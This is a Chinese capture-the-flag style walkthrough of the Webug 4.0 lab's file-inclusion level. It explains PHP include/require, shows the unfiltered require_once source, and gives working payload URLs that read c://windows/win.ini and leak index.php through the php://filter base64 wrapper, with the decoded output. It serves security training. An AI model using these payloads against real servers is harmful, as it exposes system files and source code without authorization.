Webug4.0靶场通关笔记22- 第27关文件包含

目录

一、文件包含

1、原理分析

2、文件包含函数

[(1)include( )](#(1)include( ))

[(2)include_once( )](#(2)include_once( ))

[(3)require( )](#(3)require( ))

[(4)require_once( )](#(4)require_once( ))

二、第27关渗透实战

1、打开靶场

2、源码分析

3、渗透实战

(1)查看敏感信息

(2)查看源码


本文通过《webug4靶场第27关 文件包含》来进行文件包含攻击渗透实战。

一、文件包含

1、原理分析

文件包含漏 洞的产生原因是在通过引入文件时,由于传入的文件名没有经过合理的校验,或者校检被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。这是因为Web应用在开发的过程中允许包含外部文件,如 PHP 中的include()、require()等函数,当这些函数使用用户可控的参数来指定包含的文件路径时,如果应用程序没有对用户输入进行充分的验证和过滤,就可能导致文件包含攻击。攻击者通过构造恶意的文件路径,使得通过文件包含攻击执行恶意文件,从而达到执行任意代码、获取敏感信息等目的。

  • 当被包含的文件在服务器本地时,就形成的本地文件包含。
  • 当被包含的文件在远程服务器时,就形成的远程文件包含。

2、文件包含函数

PHP****中提供了四个文件包含的函数

(1)include( )

include() 当代码执行到include()函数时才将文件包含进行,发生错误时会给出一个告警,程序继续往下执行。

(2)include_once**( )**

include_once() 功能与include()相同,区别在于当重复调用一个文件时,程序只调用一次。

(3)require( )

require() 与include()函数区别在于require()执行如果发生错误,函数会输出错误信息,并终止程序运行。

(4)require_once**( )**

require_once() 功能与require()相同,区别在于当重复调用同一个文件时,程序只调用一次。

二、第27关渗透实战

1、打开靶场

本关卡与前面的任意文件下载类似,都是对文件名没有进行过滤,如下所示打开靶场第27关。

复制代码
http://192.168.71.1/webug4/control/more/file_include.php?filename=../../template/dom_xss.html

2、源码分析

查看webug靶场第27关的index.php源码,如下所示对filename参数没进行任何过滤,存在require_once函数对filename的调用,故而具有文件包含风险,很明显产生的根本原因是源码对用户GET型输入参数filename的信任度过高,没有对包含文件的路径进行严格的验证和过滤,导致攻击者能够操纵文件包含过程,实现恶意目的。

复制代码
<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}

if (isset($_GET["filename"])) {
    if (!empty($_GET["filename"])) {
        $path = $_GET['filename'];
        require_once $path;
    }
}

3、渗透实战

(1)查看敏感信息

通过使用如下命令查看敏感文件。

复制代码
?filename=c://windows/win.ini

完整的URL地址如下所示。

复制代码
http://192.168.71.1/webug4/control/more/file_include.php?filename=c://windows/win.ini

(2)查看源码

使用php://filter/read=convert.base64-encode/resource=伪协议进行渗透,注入语句如下所示。

复制代码
filename=php://filter/read=convert.base64-encode/resource=../../index.php

完整的URL如下所示。

复制代码
http://192.168.71.1/webug4/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

获取到的base64编码为

复制代码
PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCg0KDQoyMTo1Mg0KICovDQpyZXF1aXJlX29uY2UgImNvbW1vbi9jb21tb24ucGhwIjsNCg0KDQppZiAoaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7DQogICAgaGVhZGVyKCJMb2NhdGlvbjouL2NvbnRyb2wvd2VfYnVnX2Vudi5waHAiKTsNCn0gZWxzZXsNCiAgICBoZWFkZXIoIkxvY2F0aW9uOi4vY29udHJvbC9sb2dpbi5waHAiKTsNCn0=

接下来进行base64解码,可以使用base64在线解码工具

Base64 在线编码解码 | Base64 加密解密 - Base64.us

解码后的结果如下所示,成功获取到index.php网站的源码。

复制代码
<?php
/**
 * Created by PhpStorm.


21:52
 */
require_once "common/common.php";


if (isset($_SESSION['user'])) {
    header("Location:./control/we_bug_env.php");
} else{
    header("Location:./control/login.php");
}
相关推荐
晓梦林1 天前
translate靶场学习笔记
笔记·学习·安全·web安全
德迅云安全-小潘1 天前
游戏行业面临的网络安全挑战
安全·web安全·游戏
wanhengidc1 天前
虚拟主机与服务器的区别
运维·服务器·安全·web安全·智能手机
上海云盾安全满满1 天前
企业网站 | 被攻击时该怎么办?
网络·web安全
深邃-1 天前
【Web安全】-SRC平台介绍:CNVD平台-事件型漏洞-通用型漏洞,教育SRC平台,漏洞盒子,补天漏洞平台,企业SRC平台,企业和公益SRC平台
网络协议·安全·web安全·网络安全·https·src·cnvd
HackTwoHub1 天前
AI 挖洞新思路、深度解析两大间接提示词注入漏洞攻防思路,注入也能获得上万美金
人工智能·安全·web安全·网络安全·系统安全·安全架构
其实防守也摸鱼2 天前
ctfshow--Crypto(funnyrsa1-密码2)解题步骤
python·安全·web安全·网络安全·密码学·web·工具
夏天测2 天前
2026 年 5 月中旬网络安全深度预警:高危漏洞集中爆发、零日攻击常态化,企业面临多重安全挑战
安全·web安全
QCzblack2 天前
文件上传upload
web安全
晓梦林2 天前
HiddenGate靶场学习笔记
笔记·安全·web安全